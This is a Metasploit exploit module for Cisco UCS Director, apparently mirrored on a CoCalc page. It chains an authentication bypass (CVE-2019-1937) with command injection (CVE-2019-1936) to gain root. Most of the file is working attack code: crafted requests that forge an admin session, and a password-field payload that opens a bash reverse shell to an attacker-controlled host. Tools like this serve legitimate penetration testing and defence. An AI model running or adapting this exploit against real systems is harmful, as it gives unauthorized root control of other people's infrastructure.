CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/linux/http/cisco_ucs_rce.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient910def initialize(info = {})11super(update_info(info,12'Name' => 'Cisco UCS Director Unauthenticated Remote Code Execution',13'Description' => %q{14The Cisco UCS Director virtual appliance contains two flaws that can be combined15and abused by an attacker to achieve remote code execution as root.16The first one, CVE-2019-1937, is an authentication bypass, that allows the17attacker to authenticate as an administrator.18The second one, CVE-2019-1936, is a command injection in a password change form,19that allows the attacker to inject commands that will execute as root.20This module combines both vulnerabilities to achieve the unauthenticated command21injection as root.22It has been tested with Cisco UCS Director virtual machines 6.6.0 and 6.7.0.23Note that Cisco also mentions in their advisory that their IMC Supervisor and24UCS Director Express are also affected by these vulnerabilities, but this module25was not tested with those products.26},27'Author' =>28[29'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module30],31'License' => MSF_LICENSE,32'References' =>33[34[ 'CVE', '2019-1937' ], # auth bypass35[ 'CVE', '2019-1936' ], # command injection36[ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-ucs-authby' ],37[ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-ucs-cmdinj' ],38[ 'URL', 'https://seclists.org/fulldisclosure/2019/Aug/36' ],39[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/Cisco/cisco-ucs-rce.txt' ]40],41'Platform' => 'unix',42'Arch' => ARCH_CMD,43'DefaultOptions' =>44{45'payload' => 'cmd/unix/reverse_bash',46},47'Targets' =>48[49[ 'Cisco UCS Director < 6.7.2.0', {} ],50],51'Privileged' => true,52'DefaultTarget' => 0,53'DisclosureDate' => '2019-08-21'54))5556register_options(57[58Opt::RPORT(443),59OptBool.new('SSL', [true, 'Connect with TLS', true]),60OptString.new('TARGETURI', [true, "Default server path", '/']),61])62end6364def check65# can't think of anything better then this66res = send_request_cgi({67'uri' => normalize_uri(target_uri.path, 'app', 'ui', 'login'),68'method' => 'GET'69})70if res and res.code == 30271return Exploit::CheckCode::Detected72end7374return Exploit::CheckCode::Unknown75end7677def exploit78# step 1: get a JSESSIONID cookie79res = send_request_cgi(80'uri' => normalize_uri(target_uri.path, 'app', 'ui', 'login'),81'method' => 'GET'82)8384if res and (res.code == 200 or res.code == 302)85jsession = res.get_cookies.split(';')[0]8687# step 2: authenticate our cookie as admin88res = send_request_cgi({89'uri' => normalize_uri(target_uri.path, 'app', 'ui', 'ClientServlet'),90'cookie' => jsession,91'vars_get' =>92{93'apiName' => 'GetUserInfo'94},95'headers' =>96{97# X-Requested-With and Referer headers are needed, else the server ignores us98# The X-Starship headers are the key to this auth bypass vuln, see the References99'X-Requested-With' => 'XMLHttpRequest',100'Referer' => "https://#{rhost}#{rport == 443 ? "" : ":" + rport}/",101'X-Starship-UserSession-Key' => "#{rand_text_alpha(5..12)}",102'X-Starship-Request-Key' => "#{rand_text_alpha(5..12)}"103},104'method' => 'GET'105})106107if res and res.code == 200 and res.body.include?("admin")108if not res.get_cookies.empty?109# if the server returns a new cookie, use that110jsession = res.get_cookies.split(';')[0]111end112print_good("#{peer} - Successfully bypassed auth and got our admin JSESSIONID cookie!")113114# step 3: request our reverse shell115payload = %{{"param0":"admin","param1":{"ids":null,"targetCuicId":null,"uiMenuTag":23,"cloudName":null,"filterId":null,"id":null,"type":10},"param2":"scpUserConfig","param3":[{"fieldId":"FIELD_ID_USERNAME","value":"scpuser"},{"fieldId":"FIELD_ID_DESCRIPTION","value":"The 'scpuser' will be configured on this appliance in order to enable file transfer operations via the 'scp' command. This user account cannot be used to login to the GUI or shelladmin."},{"fieldId":"FIELD_ID_PASSWORD","value":"`bash -i >& /dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} 0>&1 &``"}]}}116117res = send_request_cgi({118'uri' => normalize_uri(target_uri.path, 'app', 'ui', 'ClientServlet'),119'cookie' => jsession,120'headers' =>121{122# X-Requested-With and Referer headers are needed, else the server ignores us123# The X-Starship headers are the key to this auth bypass vuln, see the References124'X-Requested-With' => 'XMLHttpRequest',125'Referer' => "https://#{rhost}#{rport == 443 ? "" : ":" + rport}/",126},127'method' => 'POST',128'vars_post' =>129{130'formatType' => 'json',131'apiName' => 'ExecuteGenericOp',132'serviceName' => 'InfraMgr',133'opName' => 'doFormSubmit',134'opData' => payload135}136})137if res and res.code == 200138print_good("#{peer} - Shelly is here, press ENTER to start playing with her!")139end140else141fail_with(Failure::NoAccess, "#{peer} - Failed to authenticate JSESSIONID cookie")142end143else144fail_with(Failure::Unknown, "#{peer} - Failed to obtain JSESSIONID cookie")145end146end147end148149150